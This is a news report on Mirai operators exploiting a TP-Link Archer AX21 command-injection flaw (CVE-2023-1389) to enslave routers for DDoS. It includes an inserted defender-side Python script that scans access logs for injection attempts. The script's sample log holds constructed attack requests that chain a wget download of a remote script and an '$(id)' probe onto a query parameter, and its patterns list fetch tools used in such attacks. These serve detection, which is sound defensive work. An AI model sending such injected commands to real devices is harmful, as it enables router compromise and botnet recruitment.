Threat actors are targeting a recently patched TP-Link vulnerability in order to add compromised routers worldwide to the Mirai botnet, in a likely attempt to launch distributed denial-of-service (DDoS) attacks.
The vulnerability (CVE-2023-1389) exists in the TP-Link Archer AX21 Wi-Fi router and was originally discovered during the Pwn2Own Toronto event in December. After disclosure, TP-Link released a firmware update in March addressing the flaw. However, after the fix was made public, researchers with the Zero Day Initiative threat hunting team began to detect exploit attempts in the wild, starting on April 11.
“Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing ‘time-to-exploit’ speed that we continue to see across the industry,” said Peter Girnus, senior threat researcher with Trend Micro’s Zero Day Initiative, in a Monday analysis. “That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in an enterprise.”
The high-severity vulnerability stems from the localeAPI endpoint in the web management interface allowing unauthenticated command injection. While teams from Viettel and Tenable targeted the functionality on the LAN side of the router at Pwn2Own Toronto, the team from Qrious Security was able to exploit the flaw on the router’s WAN interface during the contest: they found a race condition in the iptables handling on the WAN side and chained it with the localeAPI command injection to gain code execution. Both issues were resolved by TP-Link’s patch.
Researchers said they first saw activity targeting devices in Eastern Europe, but detections have now popped up across the globe. The attackers use the TP-Link flaw to make compromised routers issue HTTP requests to the Mirai command-and-control (C2) servers, which serve a number of binary payloads built for various system architectures that the router is then made to execute.
“The binary payloads are downloaded and then executed using brute-force methodology to find the appropriate payload for the target system architecture,” said Girnus. “Once the appropriate binary is found and the payload is installed, the host becomes fully infected and establishes a connection with the Mirai C2.”
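The command injection against the locale endpoint and the download-then-execute stage described above leave a recognizable trace in the router's web-management access log. The following Python script is an added defender-side example, not code from the article, Trend Micro or ZDI: it parses combined-format access log lines, keeps only requests whose path mentions the locale endpoint, and flags query values that contain shell metacharacters, ranking a hit higher when the value also names a fetch tool. The `/localeAPI` path, the `lang` parameter and the log lines themselves are constructed assumptions; the article does not give the real vulnerable URL or parameter, so the path fragment would need to be adjusted to whatever a given device actually logs.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" access-log format; only the fields used below are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# ASSUMPTION: the article only names a "localeAPI endpoint"; the real URL path is
# not given, so this fragment is a placeholder for whatever the router logs.
LOCALE_PATH_HINT = "localeapi"

# Metacharacters that let a value escape the single argument a command sink expects.
SHELL_META = re.compile(r"(;|\|\||&&|\||`|\$\(|\$\{|\n)")

# Fetch tools typically seen in IoT download-and-execute stages.
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_values(query):
    """Split a raw query string on '&' only, so a ';' inside a value survives for inspection."""
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            yield unquote_plus(key), unquote_plus(value)


def injection_indicators(target):
    """Return the decoded query values of a request target that contain shell metacharacters."""
    hits = []
    for _, value in query_values(urlsplit(target).query):
        # Decode a second time: double-encoding is a common evasion of naive filters.
        decoded = unquote_plus(value)
        if SHELL_META.search(decoded):
            hits.append(decoded)
    return hits


def scan(log_text):
    """Flag requests to the locale endpoint whose parameters look like injection attempts."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        if LOCALE_PATH_HINT not in urlsplit(rec["target"]).path.lower():
            continue
        hits = injection_indicators(rec["target"])
        if not hits:
            continue
        # A metacharacter plus a fetch tool matches the download-then-execute stage,
        # so rank it above a bare metacharacter.
        severity = "high" if any(DOWNLOADER.search(h) for h in hits) else "medium"
        findings.append({"ip": rec["ip"], "ts": rec["ts"], "values": hits, "severity": severity})
    return findings


# Constructed sample lines using documentation-range IPs; not taken from any real device.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Apr/2023:08:15:01 +0000] "GET /localeAPI?lang=en HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.44 - - [11/Apr/2023:08:15:03 +0000] "GET /localeAPI?lang=en;wget+http://192.0.2.9/bin.sh HTTP/1.1" 200 412 "-" "curl/7.88"
203.0.113.44 - - [11/Apr/2023:08:15:04 +0000] "GET /localeAPI?lang=en%2524(id) HTTP/1.1" 200 412 "-" "curl/7.88"
198.51.100.7 - - [11/Apr/2023:08:16:10 +0000] "POST /login?user=a&b=c HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} {f['ts']} {f['values']}")
```

The query string is split by hand rather than with `parse_qsl` because older Python versions also split on `;`, which would hide exactly the separator a command-injection attempt relies on. The third sample line shows why the value is decoded twice: `%2524` becomes `%24` after one pass and `$` only after the second.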
After decrypting several strings in the payloads, researchers discovered several Mirai bot attack functions, including a TSource Engine Query attack functionality that can be used to launch a Valve Source Engine (VSE) DDoS attack against game servers, indicating one of the possible end goals behind the campaign.
The decrypted strings also reveal several specific User-Agent strings and server headers enabling the bot to imitate legitimate traffic, which would make it difficult to discern malicious traffic used for a DDoS attack from legitimate network traffic.
The Mirai botnet is known for the massive 2016 DDoS attack against DNS provider Dyn that crippled Internet service in the U.S. and took down several popular services. Since then, the malware has expanded its methods of gaining initial access beyond the use of known default credentials to also include exploiting vulnerabilities in targets, which are usually IoT devices such as home routers, IP cameras or DVRs. In 2022, for instance, attackers exploited a previously uncovered flaw in the Spring framework to deploy the Mirai malware on vulnerable devices.
In 2016, Mirai’s alleged author also released its source code, making it easier for copycats to launch their own Mirai variants (such as Moobot and RapperBot).
Girnus stressed that applying the available TP-Link updates would block a potential infection: “Applying this patch is the only recommended action to address this vulnerability, and we recommend all users of the TP-Link Archer AX21 Wi-Fi router apply it as soon as possible,” he said.